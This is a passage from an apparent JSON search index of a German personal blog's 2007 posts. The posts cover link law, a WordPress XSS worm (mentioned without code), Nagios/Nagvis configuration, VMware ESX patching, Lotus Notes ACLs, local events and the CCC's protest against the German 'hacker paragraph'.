Die Frage erscheint auf den ersten Blick ein wenig merkwürdig. Die Praxis zeigt aber, dass es viele Seitenbetreiber gibt, die sich über diesen Punkt Gedanken machen.\nAls ich die Überschrift gestern das erste Mal gelesen habe, war ich doch erstaunt. Allerdings war ich auch sofort verunsichert, da ja bereits schon viele Dinge abgemahnt wurden, die mir vorher als selbstverständlich oder logisch vorgekommen sind.\nDie Anwaltskanzlei Dr. Bahr hat hierzu einen Podcast gemacht und geht in der aktuellen Ausgabe auf die Thematik ein. Das Ergebnis ist dann doch so wie ich erwartet hatte und man kann sich nur unter ganz begrenzten Voraussetzungen vor einer Verlinkung schützen, aber nicht über einen Disclaimer wie das Gesundheitsministerium davor schützen\nHört euch am Besten den Podcast an, das geht auch direkt auf der Seite von Law Podcasting. Diese fünf Minuten waren für mich sehr informativ und die Zeit auf jeden Fall wert.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.law-podcasting.de/\" target=\"_blank\"\u003eLaw Podcasting – Das erste deutsche\nAnwalts-Audio-Blog – Kanzlei Dr. Bahr \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIst das Setzen von Links auf fremde Seiten ohne Erlaubnis des\nSeiteninhabers erlaubt? Die Frage erscheint auf den ersten Blick ein\nwenig merkwürdig. Die Praxis zeigt aber, dass es viele Seitenbetreiber\ngibt, die sich über diesen Punkt Gedanken machen.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eAls ich die Überschrift gestern das erste Mal gelesen habe, war ich doch\nerstaunt. Allerdings war ich auch sofort verunsichert, da ja bereits\nschon viele Dinge abgemahnt wurden, die mir vorher als\nselbstverständlich oder logisch vorgekommen sind.\u003c/p\u003e\n\u003cp\u003eDie Anwaltskanzlei Dr. Bahr hat hierzu einen Podcast gemacht und geht in\nder\n\u003ca href=\"http://www.law-podcasting.de/ist-das-setzen-von-links-auf-fremde-seiten-ohne-erlaubnis-des-seiteninhabers-erlaubt\" target=\"_blank\"\u003eaktuellen\nAusgabe \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n auf die Thematik ein. Das Ergebnis ist dann doch so wie ich\nerwartet hatte und man kann sich nur unter ganz begrenzten\nVoraussetzungen vor einer Verlinkung schützen, aber nicht über einen\nDisclaimer wie das Gesundheitsministerium davor schützen\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-03-law-podcasting-ist-das-setzen-von-links-auf-fremde-seiten-ohne-erlaubnis-erlaubt/","title":"Law Podcasting – Ist das Setzen von Links auf fremde Seiten ohne Erlaubnis erlaubt?"},{"body":"Der erste XSS Wurm für WordPress | bueltge.de [by:ltge.de ]:\nWie man die XSS-Lücke ausnutzt und wie man den Wurm indiziert, das erklärt mybeNi. Das ganze basiert auf WordPress Version 2.2.1.\nBueltge.de zeigt die Lücken und wie man sie per Hand schliessen kann. Alternativ kann man auch den Friendly Worm von mybeNi benutzen. Das ist jedem selbst überlassen.\nIch habe die Lücken per Hand gefixt, ich fühle mich da einfach besser, als wenn ich fremde Skripte starten würde.\nFalls jemand gerade in der Zeit des Patcheinspielens auf meinem Blog war, möchte ich mich entschuldigen. Ich hatte einen Tippfehler in einer der Änderungen, daher kam nur ein PHP-Fehler beim Aufruf der Seite.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://bueltge.de/der-erste-xss-wurm-fuer-wordpress/489/\" target=\"_blank\"\u003eDer erste XSS\nWurm für WordPress | bueltge.de [by:ltge.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWie man die XSS-Lücke ausnutzt und wie man den Wurm indiziert, das\nerklärt mybeNi. Das ganze basiert auf WordPress Version 2.2.1.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.bueltge.de\" target=\"_blank\"\u003eBueltge.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zeigt die Lücken und wie man sie per\nHand schliessen kann. Alternativ kann man auch den Friendly Worm von\n\u003ca href=\"http://mybeni.rootzilla.de\" target=\"_blank\"\u003emybeNi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n benutzen. Das ist jedem selbst\nüberlassen.\u003c/p\u003e\n\u003cp\u003eIch habe die Lücken per Hand gefixt, ich fühle mich da einfach besser,\nals wenn ich fremde Skripte starten würde.\u003c/p\u003e\n\u003cp\u003eFalls jemand gerade in der Zeit des Patcheinspielens auf meinem Blog\nwar, möchte ich mich entschuldigen. Ich hatte einen Tippfehler in einer\nder Änderungen, daher kam nur ein PHP-Fehler beim Aufruf der Seite.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-08-02-xss-wurm-fur-wordpress/","title":"XSS Wurm für WordPress"},{"body":"Ich hab es endlich geschafft Nagvis richtig in meine Nagios -Installation einzubinden. Die Darstellung ist ziemlich cool.\n]\nHier mal ein Beispiel. Ich habe unseren Visioplan der Serverschränke in png umgewandelt und als Hintergrundbild eingebunden. Danach nur noch die Status-Icons konfigurieren und einbinden.\nHier die entsprechende Maps.cfg für das obige Beispiel:\n\u0026lt;br /\u0026gt; define global {\u0026lt;br /\u0026gt; allowed_user=nagiosadmin\u0026lt;br /\u0026gt; allowed_for_config=nagiosadmin\u0026lt;br /\u0026gt; iconset=std_small\u0026lt;br /\u0026gt; map_image=netzwerkschraenke.png\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define host {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=Obelix\u0026lt;br /\u0026gt; x=1040\u0026lt;br /\u0026gt; y=385\u0026lt;br /\u0026gt; recognize_services=1\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_big\u0026lt;br /\u0026gt; hover_template=default\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define host {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=msdc01\u0026lt;br /\u0026gt; x=875\u0026lt;br /\u0026gt; y=346\u0026lt;br /\u0026gt; recognize_services=1\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_medium\u0026lt;br /\u0026gt; hover_template=default\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define service {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=msdc01\u0026lt;br /\u0026gt; service_description=DISK_C\u0026lt;br /\u0026gt; x=788\u0026lt;br /\u0026gt; y=354\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_small\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define service {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=msdc01\u0026lt;br /\u0026gt; service_description=DISK_D\u0026lt;br /\u0026gt; x=817\u0026lt;br /\u0026gt; y=354\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_small\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define host {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=asema\u0026lt;br /\u0026gt; x=875\u0026lt;br /\u0026gt; y=280\u0026lt;br /\u0026gt; recognize_services=1\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_medium\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt;\nSonstige Erweiterungen mit Nagios:\nNagiosQL ","excerpt":"\u003cp\u003eIch hab es endlich geschafft \u003ca href=\"http://www.nagvis.org\" target=\"_blank\"\u003eNagvis \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n richtig in\nmeine \u003ca href=\"http://www.nagios.org\" target=\"_blank\"\u003eNagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Installation einzubinden. Die\nDarstellung ist ziemlich cool.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2007/07/2007-07-27_120555.jpg\" alt=\"image:image:/images/2007/07/2007-07-27_120555.jpg[Nagvis im Einsatz\" /\u003e\n\u003c/p\u003e\n\n]\u003c/p\u003e\n\u003cp\u003eHier mal ein Beispiel. Ich habe unseren Visioplan der Serverschränke in\npng umgewandelt und als Hintergrundbild eingebunden. Danach nur noch die\nStatus-Icons konfigurieren und einbinden.\u003c/p\u003e\n\u003cp\u003eHier die entsprechende Maps.cfg für das obige Beispiel:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; define global {\u0026lt;br /\u0026gt; allowed_user=nagiosadmin\u0026lt;br /\u0026gt; allowed_for_config=nagiosadmin\u0026lt;br /\u0026gt; iconset=std_small\u0026lt;br /\u0026gt; map_image=netzwerkschraenke.png\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define host {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=Obelix\u0026lt;br /\u0026gt; x=1040\u0026lt;br /\u0026gt; y=385\u0026lt;br /\u0026gt; recognize_services=1\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_big\u0026lt;br /\u0026gt; hover_template=default\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define host {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=msdc01\u0026lt;br /\u0026gt; x=875\u0026lt;br /\u0026gt; y=346\u0026lt;br /\u0026gt; recognize_services=1\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_medium\u0026lt;br /\u0026gt; hover_template=default\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define service {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=msdc01\u0026lt;br /\u0026gt; service_description=DISK_C\u0026lt;br /\u0026gt; x=788\u0026lt;br /\u0026gt; y=354\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_small\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define service {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=msdc01\u0026lt;br /\u0026gt; service_description=DISK_D\u0026lt;br /\u0026gt; x=817\u0026lt;br /\u0026gt; y=354\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_small\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt; define host {\u0026lt;br /\u0026gt; backend_id=ndomy_1\u0026lt;br /\u0026gt; host_name=asema\u0026lt;br /\u0026gt; x=875\u0026lt;br /\u0026gt; y=280\u0026lt;br /\u0026gt; recognize_services=1\u0026lt;br /\u0026gt; only_hard_states=1\u0026lt;br /\u0026gt; iconset=std_medium\u0026lt;br /\u0026gt; }\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-27-nagvis-11rc3/","title":"Nagvis 1.1rc3"},{"body":"\u0026lt;strong\u0026gt;»Late night shopping«\u0026lt;/strong\u0026gt; \u0026lt;br /\u0026gt;mit NachtflohmarktAm Freitag, 27. Juli, ist es wieder so weit: Zum zweiten Mal veranstaltet die Marktgemeinde Prien und der Verband Priener Unternehmer ab 16 Uhr die Aktion »Late night shopping« in Prien. Geschäfte bis 20 Uhr geöffnet Marktgemeinde Prien am Chiemsee\nWer bitte hat diese Werbung erfunden? Also Late Night Shopping und Öffnungszeiten bis 20 Uhr passen meiner Meinung nach nicht zusammen.\nUm 20 Uhr ist es immer noch taghell. Es ist also vielleicht ein Evening Shopping oder ein Early Evening Shopping, wenn man so eine Veranstaltung schon mit Anglizismen ausrufen muss.\n","excerpt":"\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;strong\u0026gt;»Late night shopping«\u0026lt;/strong\u0026gt; \u0026lt;br /\u0026gt;mit NachtflohmarktAm Freitag, 27. Juli, ist es wieder so weit: Zum zweiten Mal veranstaltet die Marktgemeinde Prien und der Verband Priener Unternehmer ab \u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e16\u003c/span\u003e Uhr die Aktion »Late night shopping« in Prien.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGeschäfte bis \u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e20\u003c/span\u003e Uhr geöffnet\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eMarktgemeinde Prien am Chiemsee\u003c/p\u003e\n\u003cp\u003eWer bitte hat diese Werbung erfunden? Also Late Night Shopping und\nÖffnungszeiten bis 20 Uhr passen meiner Meinung nach nicht zusammen.\u003c/p\u003e\n\u003cp\u003eUm 20 Uhr ist es immer noch taghell. Es ist also vielleicht ein Evening\nShopping oder ein Early Evening Shopping, wenn man so eine Veranstaltung\nschon mit Anglizismen ausrufen muss.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-24-late-night-shopping-in-prien/","title":"Late Night Shopping in Prien"},{"body":"Bitte testet die Skripte auf einer Testumgebung! Ich übernehme für die Anleitung und Skripte keinerlei Gewähr! Bei mir hat das gut funktioniert.\nNachdem es inzwischen 37 Patche und Updates für VMware ESX 3.0.1 gibt, wollte ich diese heute installieren. Von Debian verwöhnt suchte ich erstmal nach einer Funktion wie apt-get, leider fand ich nur esxupdate.\nNach einigen Minuten Handbuch und Manpage lesen, mußte ich feststellen, daß esxupdate nur lokale Repositories oder http-, ftp-Repositories auf eigenen Webservern unterstützt. Es gibt keine Möglichkeit, die Updates mit dieser Funktion von der VmWare-Homepage herunterzuladen.\nIch fand dann noch ein Perl-Skript von Dominic Rivera , mit dem man wenigstens alle Updates in einem Rutsch installieren kann.\nWie geht man also am Besten vor?\nHerunterladen aller Patche Patche auf einen Web- oder FTP-Server kopieren und wie im esxupdate-Handbuch verfügbar machen.\nIch hatte noch Platz auf einem Intranet-Server, daher nutze ich den Apache-Server im internen LAN. Dazu reicht ein kurzer zusätzlicher Eintrag in /etc/apache2/httpd.conf (je nach Distribution).\n\u0026lt;br /\u0026gt; Set /var/www/html/esx3 as the update depot:\u0026lt;br /\u0026gt; […​]\u0026lt;br /\u0026gt; DocumentRoot \u0026quot;/var/www/html\u0026quot;\u0026lt;br /\u0026gt; \u0026lt;Directory /var/www/html/esx3\u0026gt;\u0026lt;br /\u0026gt; Options +Indexes\u0026lt;br /\u0026gt; \u0026lt;/Directory\u0026gt;\u0026lt;br /\u0026gt; […​]\u0026lt;br /\u0026gt;\nDie heruntergeladenen Patche ins angebene Verzeichnis in den Unterordner 3.0.1 kopieren.\nDie Datei patchlist.txt ins Patchverzeichnis kopieren. Link hierzu findet man auf dieser Seite .\nIch habe noch das Perlskript abgeändert, daß ohne Befehlszeilenschalter http verwendet wird`$http = true;` und den Parameter $url = \u0026quot;http:/hostname/pfad\u0026quot;; geändert. Wobei der Pfad ohne 3.0.1 anzugeben ist!\nWenn die Patche auf dem Intranetserver im Verzeichnis esx3/3.0.1/ liegen, dann sollte $url = \u0026quot;http://intranetserver/esx3\u0026quot;; gesetzt werden!\nMit Putty oder anderem ssh-Client mit dem ESX-Server verbinden. Hierzu muss eventuell in /etc/ssh/sshd_config die Zeile\nPermitRootLogin yes gesetzt werden.Achtung! Damit darf man sich remote per ssh als root anmelden. Das sollte man sich gut überlegen! Danach den ssh-Server neu starten.\nesx-autopatch.pl auf den ESX-Server kopieren (z.B. mit WinSCP )\nesx-autopatch.pl ausführbar machen: chmod +x esx-autopatch.pl\nServer in den Maintenance-Mode schalten. Hierzu müssen die virtuellen Maschinen beendet werden, dann im Infrastructure-Client mit Rechtsklick auf den ESX-Server “Maintenance-Mode einschalten” wählen.\n** Aufruf von esx-autopatch testweise ausführen ohne Installation der Updates: ./esx-autopatch.pl --open-firewall --dry-run\nJetzt kann man die Patche installieren. Bei mir dauerte das auf einer Doppel-Quad-CPU-Maschine mit 16 GB RAM annähernd 30 Minuten! Aufruf mit anschliessendem Reboot:`./esx-autopatch.pl \u0026ndash;open-firewall \u0026ndash;reboot`Die Firewall wird automatisch wieder aktiviert.\n+ Vielen Dank an dominic! Seine englische Anleitung findet man hier .\n","excerpt":"\u003cp\u003e\u003cstrong\u003eBitte testet die Skripte auf einer Testumgebung! Ich übernehme für die\nAnleitung und Skripte keinerlei Gewähr! Bei mir hat das gut\nfunktioniert.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNachdem es inzwischen 37 Patche und Updates für\n\u003ca href=\"http://www.vmware.com/products/vi/esx/\" target=\"_blank\"\u003eVMware ESX 3.0.1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n gibt, wollte\nich diese heute installieren. Von Debian verwöhnt suchte ich erstmal\nnach einer Funktion wie apt-get, leider fand ich nur esxupdate.\u003c/p\u003e\n\u003cp\u003eNach einigen Minuten Handbuch und Manpage lesen, mußte ich feststellen,\ndaß esxupdate nur lokale Repositories oder http-, ftp-Repositories auf\neigenen Webservern unterstützt. Es gibt keine Möglichkeit, die Updates\nmit dieser Funktion von der VmWare-Homepage herunterzuladen.\u003c/p\u003e\n\u003cp\u003eIch fand dann noch ein\n\u003ca href=\"http://vmprofessional.com/material/esx-autopatch.html\" target=\"_blank\"\u003ePerl-Skript von\nDominic Rivera \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, mit dem man wenigstens alle Updates in einem Rutsch\ninstallieren kann.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-18-vmware-esx-patch-installation/","title":"VMware ESX Patch-Installation"},{"body":"Im Moment gibt es nicht viel Neues, aber ich habe die Bildergallerien etwas erweitert.\nUnter anderem ein Bild von unserem Kater Vito, der aus dem als Raumbefeuchter umfunktionierten Sektkühler trinkt.\n","excerpt":"\u003cp\u003eIm Moment gibt es nicht viel Neues, aber ich habe die\n\u003ca href=\"https://www.stoeps.de/wp-gallery2.php\" target=\"_blank\"\u003eBildergallerien \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n etwas erweitert.\u003c/p\u003e\n\u003cp\u003eUnter anderem ein Bild von unserem Kater Vito, der aus dem als\nRaumbefeuchter umfunktionierten Sektkühler trinkt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-18-neue-bilder/","title":"Neue Bilder"},{"body":"In zwei Wochen (26. Juli 2007) ist die Premiere zu Simpsons der Film. Man findet auf verschiedenen Webseiten bereits Trailer , Gewinnspiele etc.\nSeit ein paar Wochen kann man sich auch seinen eigenen Simpsons Charakter selbst zusammenstellen. Ich bin bisher nicht dazugekommen, habe heute versucht mich im berühmten Gelbton nachzubilden.\nHier könnt ihr euch selbst einen Simpsons Charakter basteln.\nIch denke, das ist ganz gut getroffen. Viel Spaß beim Rumspielen.\n","excerpt":"\u003cp\u003eIn zwei Wochen (26. Juli 2007) ist die Premiere zu Simpsons der Film.\nMan findet auf verschiedenen Webseiten bereits\n\u003ca href=\"http://www.simpsonsline.com/?go=trailer\" target=\"_blank\"\u003eTrailer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\n\u003ca href=\"http://www.simpsonsline.com/?go=win\" target=\"_blank\"\u003eGewinnspiele \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n etc.\u003c/p\u003e\n\u003cp\u003eSeit ein paar Wochen kann man sich auch seinen eigenen Simpsons\nCharakter selbst zusammenstellen. Ich bin bisher nicht dazugekommen,\nhabe heute versucht mich im berühmten Gelbton nachzubilden.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.simpsonsmovie.com/main.html\" target=\"_blank\"\u003eHier \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n könnt ihr euch selbst einen\nSimpsons Charakter basteln.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/07/avatar2.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/07/avatar2.jpg\" alt=\"Stoeps\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIch denke, das ist ganz gut getroffen. Viel Spaß beim Rumspielen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-11-simpsons-der-film/","title":"Simpsons der Film"},{"body":"Die neue Startseite des Chaos Computer Clubs als Antwort auf den Hackerparagraphen §202c StGB zeigt eine grüne Wiese.\nZitat: Per Gesetzesänderung (§202c StGB) hat die Bundesregierung das Internet wieder zur Blümchenwiese gemacht. Da es keine Sicherheitsprobleme mehr gibt, brauchen wir jetzt auch keine Sicherheitswerkzeuge mehr.\nDas trifft die Problematik eigentlich ganz gut. Wie so oft in letzter Zeit werden schwammige Paragraphen erlassen, die einen großen Ermessensspielraum haben. In diesem Fall zwar mit einer Beschlußempfehlung, es wird also ein weiteres Dokument erstellt, in dem die Auslegung niedergeschrieben wird, bzw. man schreibt fest, daß der Paragraph geändert werden muss, wenn er anders als gedacht ausgelegt wird. Meiner Meinung nach absoluter Blödsinn, dann muss man ihn halt eindeutig formulieren.\nDer §202 StGB ist Teil des Cybercrime Abkommens des Europarates.\nvia Netzpolitik.org ","excerpt":"\u003cp\u003eDie neue Startseite des \u003ca href=\"http://www.ccc.de\" target=\"_blank\"\u003eChaos Computer Clubs \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n als\nAntwort auf den Hackerparagraphen §202c StGB zeigt eine grüne Wiese.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eZitat:\u003c/strong\u003e Per Gesetzesänderung (§202c StGB) hat die Bundesregierung das\nInternet wieder zur Blümchenwiese gemacht. Da es keine\nSicherheitsprobleme mehr gibt, brauchen wir jetzt auch keine\nSicherheitswerkzeuge mehr.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eDas trifft die Problematik eigentlich ganz gut. Wie so oft in letzter\nZeit werden schwammige Paragraphen erlassen, die einen großen\nErmessensspielraum haben. In diesem Fall zwar mit einer\nBeschlußempfehlung, es wird also ein weiteres Dokument erstellt, in dem\ndie Auslegung niedergeschrieben wird, bzw. man schreibt fest, daß der\nParagraph geändert werden muss, wenn er anders als gedacht ausgelegt\nwird. Meiner Meinung nach absoluter Blödsinn, dann muss man ihn halt\neindeutig formulieren.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-06-ccc-internet-wird-zur-blumchenwiese/","title":"CCC: Internet wird zur Blümchenwiese"},{"body":"IBM hat hier einen interessanten Artikel veröffentlicht, der erklärt, welche ACL-Einstellungen man machen muss, um die Einstellungen des Reiters Delegierung abzubilden.\n_\nDer Artikel lässt leider offen, ob die über die ACL eingetragenen Personen in den Delegierungsübersichten beim User erscheinen. Ich werde das morgen mal kurz testen und poste hier kurz die Auswirkung._\nUpdate Die ACL-Einträge wirken sich tatsächlich auch auf die Delegierungseinträge aus.\nIch habe folgenden Eintrag in meiner Zugriffskontroll-Liste erstellt:\nDas Ergebnis sieht man hier im Delegierungsdialog:\n","excerpt":"\u003cp\u003eIBM hat hier einen\n\u003ca href=\"http://www-1.ibm.com/support/docview.wss?rs=463\u0026amp;context=SSKTMJ\u0026amp;dc=DB520\u0026amp;uid=swg21087189\u0026amp;loc=en_US\u0026amp;cs=UTF-8%E2%8C%A9=en\u0026amp;rss=ct463lotus\" target=\"_blank\"\u003einteressanten\nArtikel \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n veröffentlicht, der erklärt, welche ACL-Einstellungen man\nmachen muss, um die Einstellungen des Reiters Delegierung abzubilden.\u003c/p\u003e\n\u003cp\u003e_\u003c/p\u003e\n\u003cp\u003eDer Artikel lässt leider offen, ob die über die ACL eingetragenen\nPersonen in den Delegierungsübersichten beim User erscheinen. Ich werde\ndas morgen mal kurz testen und poste hier kurz die Auswirkung._\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eDie ACL-Einträge wirken sich tatsächlich auch auf die\nDelegierungseinträge aus.\u003c/p\u003e\n\u003cp\u003eIch habe folgenden Eintrag in meiner Zugriffskontroll-Liste erstellt:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/07/2007-07-06_085219.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/07/2007-07-06_085219-150x150.jpg\" alt=\"ACL Dialog\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDas Ergebnis sieht man hier im Delegierungsdialog:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/07/2007-07-06_085235.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/07/2007-07-06_085235-150x150.jpg\" alt=\"Delegierungsdialog\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-05-wie-wirkt-sich-bei-lotus-notes-die-delegierung-auf-die-acl-aus/","title":"Wie wirkt sich bei Lotus Notes die Delegierung auf die ACL aus?"},{"body":"Heute abend war Biermösl Blosn im Festzelt Greimharting .\nEs war ein sehr gelungener Abend, der von der SG Greimharting organisiert wurde und anlässlich des 50. Gründungsfestes des GTEV Ratzingerhöh Greimharting ausgerichtet wurde. (Der GTEV wurde 50 und nicht wie hier gemeldet der SG Greimharting!)\nBiermösl Blosn ist life auf jeden Fall einen Besuch wert. Wir (Corinna, Christine , Flori und ich) haben sehr gelacht und ich denke die Gebrüder Well machen eine gelungene Grätsche zwischen Unterhaltung, Brauchtum und Komödie (Comedy).\nEs waren zwar fast alles bekannte Lieder, die man bereits von den CDs kannte, sie waren aber großteils an die lokalen Gegebenheiten angepaßt. Es wurden also auch Lokalpolitiker namentlich durch den Kakao gezogen. :-)\nMorgen spielen noch die Spider Murphy Gang, allerdings habe ich mir dazu keine Karten geholt.\n","excerpt":"\u003cp\u003eHeute abend war \u003ca href=\"http://www.biermoesl-blosn.de\" target=\"_blank\"\u003eBiermösl Blosn \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n im\n\u003ca href=\"http://www.jugendverein-greimharting.de/festzelt-greimharting/festzelt.index2.html\" target=\"_blank\"\u003eFestzelt\nGreimharting \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eEs war ein sehr gelungener Abend, der von der SG Greimharting\norganisiert wurde und anlässlich des 50. Gründungsfestes des\n\u003ca href=\"http://www.jugendverein-greimharting.de\" target=\"_blank\"\u003eGTEV Ratzingerhöh Greimharting \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nausgerichtet wurde. (Der GTEV wurde 50 und nicht\n\u003ca href=\"http://www.pressewoche.de/furorum-woche.article/101220.html\" target=\"_blank\"\u003ewie hier \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ngemeldet der SG Greimharting!)\u003c/p\u003e\n\u003cp\u003eBiermösl Blosn ist life auf jeden Fall einen Besuch wert. Wir (Corinna,\n\u003ca href=\"http://www.bielmeiers.de\" target=\"_blank\"\u003eChristine \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://www.fmb-net.de\" target=\"_blank\"\u003eFlori \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und\nich) haben sehr gelacht und ich denke die Gebrüder Well machen eine\ngelungene Grätsche zwischen Unterhaltung, Brauchtum und Komödie\n(Comedy).\u003c/p\u003e\n\u003cp\u003eEs waren zwar fast alles bekannte Lieder, die man bereits von den CDs\nkannte, sie waren aber großteils an die lokalen Gegebenheiten angepaßt.\nEs wurden also auch 